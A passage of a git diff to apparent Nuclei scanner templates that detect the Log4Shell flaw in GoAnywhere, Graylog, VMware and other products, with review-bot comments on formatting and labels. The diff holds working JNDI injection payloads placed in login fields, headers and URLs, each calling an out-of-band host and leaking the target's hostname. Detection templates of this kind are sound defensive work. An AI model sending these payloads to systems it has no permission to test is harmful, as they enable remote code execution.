@@ -33,7 +37,7 @@ http: Origin: {{RootURL}} Referer: {{RootURL}}/goanywhere/auth/Login.xhtml - formPanel%3AloginGrid%3Aname=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}&formPanel%3AloginGrid%3Avalue_hinput=pass&formPanel%3AloginGrid%3Avalue={{view}}}&formPanel%3AloginGrid%3AloginButton=&loginForm_SUBMIT=1&javax.faces.ViewState={{view}} + formPanel%3AloginGrid%3Aname=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.name.{{interactsh-url}}}&formPanel%3AloginGrid%3Avalue_hinput=pass&formPanel%3AloginGrid%3Avalue={{view}}}&formPanel%3AloginGrid%3AloginButton=&loginForm_SUBMIT=1&javax.faces.ViewState={{view}} cookie-reuse: true matchers-condition: and @@ -46,7 +50,7 @@ http: - type: regex part: interactsh_request regex: - - '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output extractors: - type: regex @@ -61,10 +65,16 @@ http: kval: - interactsh_ip # Print remote interaction IP in output + - type: regex + part: interactsh_request + group: 2 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output + - type: regex part: interactsh_request group: 1 regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output # Enhanced by cs 2022/10/10 diff --git a/http/vulnerabilities/other/graylog-log4j.yaml b/http/vulnerabilities/other/graylog-log4j.yaml index b4dde62e0e..0e48100e8b 100644 --- a/http/vulnerabilities/other/graylog-log4j.yaml +++ b/http/vulnerabilities/other/graylog-log4j.yaml 
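Review bot: The rewritten POST body line in goanywhere-mft-log4j-rce.yaml still contains `formPanel%3AloginGrid%3Avalue={{view}}}` with a trailing `}` after `{{view}}`; it is carried over from the old line rather than introduced here, but since the line is being rewritten anyway this is the moment to drop it, as the brace is otherwise sent as part of the form value. Suggested: `...formPanel%3AloginGrid%3Avalue={{view}}&formPanel%3AloginGrid%3AloginButton=...` with the rest of the line unchanged. The extractor that defines `view` is outside the hunk, so confirm the trailing brace is not intentional before removing it.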
@@ -20,6 +20,10 @@ info: verified: "true" tags: cve,cve2021,rce,jndi,log4j,graylog,kev,oast +variables: + rand1: '{{rand_int(111, 999)}}' + rand2: '{{rand_int(111, 999)}}' + http: - raw: - | @@ -32,7 +36,7 @@ http: Origin: {{BaseURL}} Referer: {{BaseURL}} - {"username":"${jndi:ldap://${sys:os.name}.{{interactsh-url}}}","password":"admin","host":"{{Hostname}}"} + {"username":"${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}}","password":"admin","host":"{{Hostname}}"} matchers-condition: and matchers: @@ -44,7 +48,7 @@ http: - type: regex part: interactsh_request regex: - - '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output - type: word part: header @@ -56,10 +60,16 @@ http: kval: - interactsh_ip # Print remote interaction IP in output + - type: regex + part: interactsh_request + group: 2 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output + - type: regex part: interactsh_request group: 1 regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output # Enhanced by md on 2023/03/23 diff --git a/http/vulnerabilities/other/metabase-log4j.yaml b/http/vulnerabilities/other/metabase-log4j.yaml index e41ef8f305..36791dbde1 100644 --- a/http/vulnerabilities/other/metabase-log4j.yaml +++ b/http/vulnerabilities/other/metabase-log4j.yaml 
@@ -20,10 +20,14 @@ info: verified: "true" tags: cve,cve2021,rce,jndi,log4j,metabase,kev,oast +variables: + rand1: '{{rand_int(111, 999)}}' + rand2: '{{rand_int(111, 999)}}' + http: - method: GET path: - - "{{BaseURL}}/api/geojson?url=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}" + - "{{BaseURL}}/api/geojson?url=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.url.{{interactsh-url}}}" matchers-condition: and matchers: @@ -35,7 +39,7 @@ http: - type: regex part: interactsh_request regex: - - '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output - type: word part: body @@ -47,8 +51,14 @@ http: kval: - interactsh_ip # Print remote interaction IP in output + - type: regex + part: interactsh_request + group: 2 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output + - type: regex part: interactsh_request group: 1 regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output diff --git a/http/vulnerabilities/other/opennms-log4j-jndi-rce.yaml b/http/vulnerabilities/other/opennms-log4j-jndi-rce.yaml index c4dc6b88e6..b3652f3f84 100644 --- a/http/vulnerabilities/other/opennms-log4j-jndi-rce.yaml +++ b/http/vulnerabilities/other/opennms-log4j-jndi-rce.yaml @@ -22,6 +22,10 @@ info: verified: "true" tags: jndi,log4j,rce,opennms,cve,cve2021,kev,oast +variables: + rand1: '{{rand_int(111, 999)}}' + rand2: '{{rand_int(111, 999)}}' + http: - raw: - | 
@@ -29,7 +33,7 @@ http: Referer: {{RootURL}}/opennms/login.jsp Content-Type: application/x-www-form-urlencoded - j_username=${jndi:ldap://${hostName}.{{interactsh-url}}}&j_password=password&Login=&j_usergroups= + j_username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.postdata.{{interactsh-url}}}&j_password=password&Login=&j_usergroups= matchers-condition: and matchers: @@ -41,17 +45,23 @@ http: - type: regex part: interactsh_request regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output extractors: - type: kval kval: - interactsh_ip # Print remote interaction IP in output + - type: regex + part: interactsh_request + group: 2 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output + - type: regex part: interactsh_request group: 1 regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output # Enhanced by cs on 2022/10/23 diff --git a/http/vulnerabilities/other/rundeck-log4j.yaml b/http/vulnerabilities/other/rundeck-log4j.yaml index ac18f2b942..e75aff0a70 100644 --- a/http/vulnerabilities/other/rundeck-log4j.yaml +++ b/http/vulnerabilities/other/rundeck-log4j.yaml @@ -20,6 +20,10 @@ info: verified: "true" tags: cve,cve2021,rce,jndi,log4j,rundeck,kev,oast +variables: + rand1: '{{rand_int(111, 999)}}' + rand2: '{{rand_int(111, 999)}}' + http: - raw: - | 
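Review bot: The injection-point label in the rewritten `j_username=` line of opennms-log4j-jndi-rce.yaml is `postdata`, while cisco-unified-communications, cisco-vmanage, jamf and mobileiron in this same diff label the identical `j_username`/`username` field `username`; rundeck-log4j and unifi-network-log4j-rce also use `postdata`. Group 2 of the new extractor surfaces this label as the "injection point" in scan output, so the same field should carry the same label across templates: `j_username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}}&j_password=password&Login=&j_usergroups=` here, `.username.` in rundeck as well, and a field-named label in unifi — or document the naming convention once in the `variables:` block.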
@@ -30,7 +34,7 @@ http: Connection: close Referer: {{BaseURL}}/user/login - j_username=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}&j_password=admin + j_username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.postdata.{{interactsh-url}}}&j_password=admin matchers-condition: and matchers: @@ -42,7 +46,7 @@ http: - type: regex part: interactsh_request regex: - - '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output - type: word part: location @@ -54,8 +58,14 @@ http: kval: - interactsh_ip # Print remote interaction IP in output + - type: regex + part: interactsh_request + group: 2 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output + - type: regex part: interactsh_request group: 1 regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output diff --git a/http/vulnerabilities/other/unifi-network-log4j-rce.yaml b/http/vulnerabilities/other/unifi-network-log4j-rce.yaml index 34eb8d1bf4..a69ef0488f 100644 --- a/http/vulnerabilities/other/unifi-network-log4j-rce.yaml +++ b/http/vulnerabilities/other/unifi-network-log4j-rce.yaml @@ -22,6 +22,10 @@ info: verified: "true" tags: cve,cve2021,rce,log4j,ubnt,unifi,oast,jndi,kev +variables: + rand1: '{{rand_int(111, 999)}}' + rand2: '{{rand_int(111, 999)}}' + http: - raw: - | 
@@ -31,7 +35,7 @@ http:
 Origin: {{RootURL}}
 Referer: {{RootURL}}/manage/account/login?redirect=%2Fmanage
- {"username":"user","password":"pass","remember":"${jndi:ldap://${hostName}.{{interactsh-url}}}","strict":true}
+ {"username":"user","password":"pass","remember":"${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.postdata.{{interactsh-url}}}","strict":true}
 matchers-condition: and
 matchers:
@@ -43,13 +47,23 @@ http:
 - type: regex
 part: interactsh_request
 regex:
- - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
+ - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
 extractors:
+ - type: kval
+ kval:
+ - interactsh_ip # Print remote interaction IP in output
+
+ - type: regex
+ part: interactsh_request
+ group: 2
+ regex:
+ - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
+
 - type: regex
 part: interactsh_request
 group: 1
 regex:
- - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
+ - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
 # Enhanced by mp on 2022/06/03
diff --git a/http/vulnerabilities/other/vmware-siterecovery-log4j-rce.yaml b/http/vulnerabilities/other/vmware-siterecovery-log4j-rce.yaml
index aca4005456..05b40f2f35 100644
--- a/http/vulnerabilities/other/vmware-siterecovery-log4j-rce.yaml
+++ b/http/vulnerabilities/other/vmware-siterecovery-log4j-rce.yaml
@@ -21,10 +21,14 @@ info:
 verified: "true"
 tags: cve,cve2021,jndi,log4j,rce,oast,vmware,siterecovery,kev
+variables:
+ rand1: '{{rand_int(111, 999)}}'
+ rand2: '{{rand_int(111, 999)}}'
+
 http:
 - method: GET
 path:
- - '{{BaseURL}}/dr/authentication/oauth2/oauth2login?error=%24%7Bjndi%3Aldap%3A%2F%2F%24%7BhostName%7D.{{interactsh-url}}%7D'
+ - '{{BaseURL}}/dr/authentication/oauth2/oauth2login?error=$%7Bjndi%3Aldap%3A%2F%2F$%7B%3A-{{rand1}}%7D$%7B%3A-{{rand2}}%7D.$%7BhostName%7D.uri.{{interactsh-url}}%7D'
 matchers-condition: and
 matchers:
@@ -36,7 +40,7 @@ http:
 - type: regex
 part: interactsh_request
 regex:
- - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
+ - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
 - type: word
 part: body
@@ -48,8 +52,14 @@ http:
 kval:
 - interactsh_ip # Print remote interaction IP in output
+ - type: regex
+ part: interactsh_request
+ group: 2
+ regex:
+ - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
+
 - type: regex
 part: interactsh_request
 group: 1
 regex:
- - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
+ - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
diff --git a/http/vulnerabilities/other/xenmobile-server-log4j.yaml b/http/vulnerabilities/other/xenmobile-server-log4j.yaml
index 2158b0c435..2348d55b03 100644
--- a/http/vulnerabilities/other/xenmobile-server-log4j.yaml
+++ b/http/vulnerabilities/other/xenmobile-server-log4j.yaml
@@ -11,6 +11,10 @@ info:
 shodan-query: title:"XenMobile"
 tags: cve,cve2021,rce,jndi,log4j,xenmobile,oast
+variables:
+ rand1: '{{rand_int(111, 999)}}'
+ rand2: '{{rand_int(111, 999)}}'
+
 http:
 - raw:
 - |
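Review bot: The rewritten `path:` entry in vmware-siterecovery-log4j-rce.yaml percent-encodes `{`, `}`, `:` and `/` but leaves all four `$` characters bare, whereas the removed line encoded them as `%24`; `$` is a permitted sub-delimiter in a query string, so the value should still arrive intact, but mixing encoded and literal reserved characters on one line makes the request harder to review and easy to break on the next edit. Either restore `%24` for each `$` or add a comment stating why the literal form is required here. The `variables:` block in the same hunk matches what the other templates in this diff receive.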
@@ -23,7 +27,7 @@ http:
 Origin: {{BaseURL}}
 Referer: {{BaseURL}}/zdm/login_xdm_uc.jsp
- login=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}&password=admin
+ login=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.postdata.{{interactsh-url}}}&password=admin
 matchers-condition: and
 matchers:
@@ -35,7 +39,7 @@ http:
 - type: regex
 part: interactsh_request
 regex:
- - '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable
+ - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
 - type: word
 part: body
@@ -47,8 +51,14 @@ http:
 kval:
 - interactsh_ip # Print remote interaction IP in output
+ - type: regex
+ part: interactsh_request
+ group: 2
+ regex:
+ - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
+
 - type: regex
 part: interactsh_request
 group: 1
 regex:
- - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output
+ - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
diff --git a/http/vulnerabilities/springboot/springboot-log4j-rce.yaml b/http/vulnerabilities/springboot/springboot-log4j-rce.yaml
index c4db37d567..07b274d7c6 100644
--- a/http/vulnerabilities/springboot/springboot-log4j-rce.yaml
+++ b/http/vulnerabilities/springboot/springboot-log4j-rce.yaml
@@ -20,12 +20,16 @@ info:
 metadata:
 max-request: 1
+variables:
+ rand1: '{{rand_int(111, 999)}}'
+ rand2: '{{rand_int(111, 999)}}'
+
 http:
 - raw:
 - |
 GET / HTTP/1.1
 Host: {{Hostname}}
- X-Api-Version: ${jndi:ldap://${hostName}.{{interactsh-url}}}
+ X-Api-Version: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xapiversion.{{interactsh-url}}}
 matchers-condition: and
 matchers:
@@ -37,17 +41,23 @@ http:
 - type: regex
 part: interactsh_request
 regex:
- - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
+ - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
 extractors:
 - type: kval
 kval:
 - interactsh_ip # Print remote interaction IP in output
+ - type: regex
+ part: interactsh_request
+ group: 2
+ regex:
+ - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
+
 - type: regex
 part: interactsh_request
 group: 1
 regex:
- - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
+ - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
 # Enhanced by mp on 2022/05/31
diff --git a/http/vulnerabilities/vmware/vmware-hcx-log4j.yaml b/http/vulnerabilities/vmware/vmware-hcx-log4j.yaml
index 3877eb0b4f..20857cd01f 100644
--- a/http/vulnerabilities/vmware/vmware-hcx-log4j.yaml
+++ b/http/vulnerabilities/vmware/vmware-hcx-log4j.yaml
@@ -20,6 +20,10 @@ info:
 verified: "true"
 tags: cve,cve2021,rce,jndi,log4j,vmware,kev,oast
+variables:
+ rand1: '{{rand_int(111, 999)}}'
+ rand2: '{{rand_int(111, 999)}}'
+
 http:
 - raw:
 - |
@@ -32,7 +36,7 @@ http:
 {
 "authType": "password",
- "username": "${jndi:ldap://${sys:os.name}.{{interactsh-url}}}",
+ "username": "${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}}",
 "password": "admin"
 }
@@ -46,16 +50,23 @@ http:
 - type: regex
 part: interactsh_request
 regex:
- - '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable
+ - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
 extractors:
 - type: kval
 kval:
 - interactsh_ip # Print remote interaction IP in output
+
+ - type: regex
+ part: interactsh_request
+ group: 2
+ regex:
+ - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
+
 - type: regex
 part: interactsh_request
 group: 1
 regex:
- - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output
+ - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
 # Enhanced by md on 2022/10/05
diff --git a/http/vulnerabilities/vmware/vmware-nsx-log4j.yaml b/http/vulnerabilities/vmware/vmware-nsx-log4j.yaml
index a2184675c3..fdc815da88 100644
--- a/http/vulnerabilities/vmware/vmware-nsx-log4j.yaml
+++ b/http/vulnerabilities/vmware/vmware-nsx-log4j.yaml
@@ -20,6 +20,10 @@ info:
 verified: "true"
 tags: cve,cve2021,rce,jndi,log4j,graylog,kev,oast
+variables:
+ rand1: '{{rand_int(111, 999)}}'
+ rand2: '{{rand_int(111, 999)}}'
+
 http:
 - raw:
 - |
@@ -30,7 +34,7 @@ http:
 Origin: {{BaseURL}}
 Referer: {{BaseURL}}/login.jsp
- username=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}&password=admin&submit=
+ username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}}&password=admin&submit=
 matchers-condition: and
 matchers:
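Review bot: The context line `tags: cve,cve2021,rce,jndi,log4j,graylog,kev,oast` in vmware-nsx-log4j.yaml, directly above the `variables:` block this commit inserts, carries a `graylog` tag that looks like a leftover from another template and is left untouched here; since the `info:` block is already being edited, replacing it with `vmware,nsx` would bring the tag set in line with the sibling vmware/ templates in this diff and keep tag-based template selection accurate. The added `variables:` block itself matches the other files.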
@@ -42,7 +46,7 @@ http:
 - type: regex
 part: interactsh_request
 regex:
- - '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable
+ - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
 - type: word
 part: location
@@ -54,8 +58,14 @@ http:
 kval:
 - interactsh_ip # Print remote interaction IP in output
+ - type: regex
+ part: interactsh_request
+ group: 2
+ regex:
+ - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
+
 - type: regex
 part: interactsh_request
 group: 1
 regex:
- - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output
+ - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
diff --git a/http/vulnerabilities/vmware/vmware-operation-manager-log4j.yaml b/http/vulnerabilities/vmware/vmware-operation-manager-log4j.yaml
index e51d71778d..8980a6643e 100644
--- a/http/vulnerabilities/vmware/vmware-operation-manager-log4j.yaml
+++ b/http/vulnerabilities/vmware/vmware-operation-manager-log4j.yaml
@@ -20,6 +20,10 @@ info:
 verified: "true"
 tags: cve,cve2021,rce,jndi,log4j,vmware,kev,oast
+variables:
+ rand1: '{{rand_int(111, 999)}}'
+ rand2: '{{rand_int(111, 999)}}'
+
 http:
 - raw:
 - |
@@ -33,7 +37,7 @@ http:
 Sec-Fetch-Mode: cors
 Sec-Fetch-Site: same-origin
- mainAction=login&userName=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}&password=admin&authSourceId=localItem&authSourceName=Local%20Users&authSourceType=LOCAL&forceLogin=&timezone=330&languageCode=us
+ mainAction=login&userName=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}}&password=admin&authSourceId=localItem&authSourceName=Local%20Users&authSourceType=LOCAL&forceLogin=&timezone=330&languageCode=us
 matchers-condition: and
 matchers:
@@ -45,7 +49,7 @@ http:
 - type: regex
 part: interactsh_request
 regex:
- - '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable
+ - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
 - type: word
 part: header
@@ -57,8 +61,14 @@ http:
 kval:
 - interactsh_ip # Print remote interaction IP in output
+ - type: regex
+ part: interactsh_request
+ group: 2
+ regex:
+ - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
+
 - type: regex
 part: interactsh_request
 group: 1
 regex:
- - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output
+ - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
diff --git a/http/vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml b/http/vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml
index 428d995cb1..d37d281e1c 100644
--- a/http/vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml
+++ b/http/vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml
@@ -23,6 +23,10 @@ info:
 verified: "true"
 tags: cve,cve2021,oast,rce,log4j,vmware,vrealize,kev
+variables:
+ rand1: '{{rand_int(111, 999)}}'
+ rand2: '{{rand_int(111, 999)}}'
+
 http:
 - raw:
 - |
@@ -32,7 +36,7 @@ http:
 Origin: {{RootURL}}
 Referer: {{RootURL}}/ui/
- {"username":"${jndi:ldap://${hostName}.{{interactsh-url}}}","password":"admin"}
+ {"username":"${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}}","password":"admin"}
 matchers-condition: and
 matchers:
@@ -44,13 +48,23 @@ http:
 - type: regex
 part: interactsh_request
 regex:
- - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
+ - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
 extractors:
+ - type: kval
+ kval:
+ - interactsh_ip # Print remote interaction IP in output
+
+ - type: regex
+ part: interactsh_request
+ group: 2
+ regex:
+ - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
+
 - type: regex
 part: interactsh_request
 group: 1
 regex:
- - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
+ - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
 # Enhanced by mp on 2022/04/05